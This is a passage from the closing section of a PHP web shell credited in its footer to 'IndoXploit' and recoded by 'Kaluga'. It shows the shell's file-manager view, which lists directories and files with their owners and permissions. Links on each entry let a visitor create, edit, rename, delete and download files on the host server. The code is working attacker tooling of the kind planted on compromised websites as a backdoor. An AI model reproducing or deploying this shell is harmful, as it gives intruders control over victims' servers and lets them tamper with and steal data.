1904.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1905.                     } else {
1906.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1907.                 }
1908.                 echo "<tr>";
1909.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1910.                 echo "<td class='td_home'><center>$dtype</center></td>";
1911.                 echo "<td class='td_home'><center>-</center></th></td>";
1912.                 echo "<td class='td_home'><center>$dtime</center></td>";
1913.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1914.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1915.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1916.                 echo "</tr>";
1917.             }
1918.         }
1919.     } else {
1920.         echo "<font color=red>can't open directory.</font>";
1921.     }
1922.         foreach($scandir as $file) {
1923.             $ftype = filetype("$dir/$file");
1924.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1925.             $size = filesize("$dir/$file")/1024;
1926.             $size = round($size,3);
1927.             if(function_exists('posix_getpwuid')) {
1928.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1929.                 $fowner = $fowner['name'];
1930.             } else {
1931.                 //$downer = $uid;
1932.                 $fowner = fileowner("$dir/$file");
1933.             }
1934.             if(function_exists('posix_getgrgid')) {
1935.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1936.                 $fgrp = $fgrp['name'];
1937.             } else {
1938.                 $fgrp = filegroup("$dir/$file");
1939.             }
1940.             if($size > 1024) {
1941.                 $size = round($size/1024,2). 'MB';
1942.             } else {
1943.                 $size = $size. 'KB';
1944.             }
1945.             if(!is_file("$dir/$file")) continue;
1946.             echo "<tr>";
1947.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1948.             echo "<td class='td_home'><center>$ftype</center></td>";
1949.             echo "<td class='td_home'><center>$size</center></td>";
1950.             echo "<td class='td_home'><center>$ftime</center></td>";
1951.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1952.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1953.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1954.             echo "</tr>";
1955.         }
1956.         echo "</table>";
1957.         if(!is_readable($dir)) {
1958.             //
1959.         } else {
1960.             echo "<hr>";
1961.         }
1962.     echo "<center>Copyright &copy; ".date("Y")." - <a href='http://www.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> <td>Recode By<td> <a href='http://facebook.com/kalugahere/' target='_blank'><font color=lime>Kaluga</font></a></center>";
1963. }
1964. ?>
1965. </html>